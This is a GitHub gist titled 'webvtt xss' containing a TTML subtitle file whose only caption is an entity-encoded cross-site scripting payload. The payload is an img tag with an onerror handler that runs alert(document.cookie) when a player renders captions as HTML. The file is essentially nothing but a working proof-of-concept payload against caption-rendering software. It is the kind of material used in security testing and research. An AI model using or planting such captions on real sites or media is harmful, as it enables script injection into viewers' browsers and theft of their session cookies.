Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

@W1R3D-Code
Last active July 1, 2019 18:04
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save W1R3D-Code/b865d205d17ae2800ffdea860a939922 to your computer and use it in GitHub Desktop.
Save W1R3D-Code/b865d205d17ae2800ffdea860a939922 to your computer and use it in GitHub Desktop.
webvtt xss
<?xml version="1.0" encoding="UTF-8"?>
<tt xmlns="http://www.w3.org/2006/10/ttaf1" xmlns:ttp="http://www.w3.org/2006/10/ttaf1#parameter" xmlns:ttm="http://www.w3.org/2006/10/ttaf1#metadata" xmlns:tts="http://www.w3.org/2006/10/ttaf1#styling" xml:lang="en" ttp:frameRate="25" ttp:timeBase="media">
<head/>
<body>
<div>
<p xml:id="c0" xml:space="preserve" begin="00:00:01.000" end="00:00:02.000" tts:backgroundColor="black" tts:fontSize="15" tts:origin="0px 0px">&#x3C;img src=x onerror=alert(document.cookie) /&#x3E;</p>
</div>
</body>
</tt>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment